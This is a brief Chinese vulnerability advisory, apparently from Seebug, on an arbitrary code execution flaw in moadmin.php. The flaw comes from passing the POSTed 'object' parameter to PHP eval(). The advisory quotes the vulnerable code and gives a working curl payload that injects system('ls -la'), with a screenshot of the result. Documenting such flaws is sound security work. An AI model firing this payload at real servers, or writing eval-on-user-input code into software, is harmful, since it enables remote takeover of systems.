<ul><li>/moadmin.php</li></ul><pre class="">
/**
* Saves an object
*
* @param string $collection
* @param string $obj
* @return array
*/
public function saveObject($collection, $obj) {
eval('$obj=' . $obj . ';'); //cast from string to array
return $this->mongo->selectCollection($collection)->save($obj);
}
….
$action = (isset($_GET['action']) ? $_GET['action'] : 'listCollections');
if (isset($_POST['object'])) {
if (self::$model->saveObject($_GET['collection'], $_POST['object'])) {
return $this->_dumpFormVals();
} else {
$action = 'editObject';
$_POST['errors']['object'] = 'Error: object could not be saved - check your array syntax.';
}
</pre><p>saveObject 直接将用户传入的object带入eval执行,造成任意代码执行漏洞。<br></p><p>使用命令,在目标服务器上执行ls命令:</p><pre class="">curl http://hatsuyuki.sakura/moadmin/moadmin.php -d "object=1;system('ls -la');exit"</pre><p>得到回显:</p><p> </p><p><img alt="1D2529FE-66D1-47B1-ABF6-3FEFDD82586D.png" src="https://images.seebug.org/@/uploads/1433921840066-1D2529FE-66D1-47B1-ABF6-3FEFDD82586D.png" data-image-size="1044,160"><br></p>
京公网安备 11010502034610号
暂无评论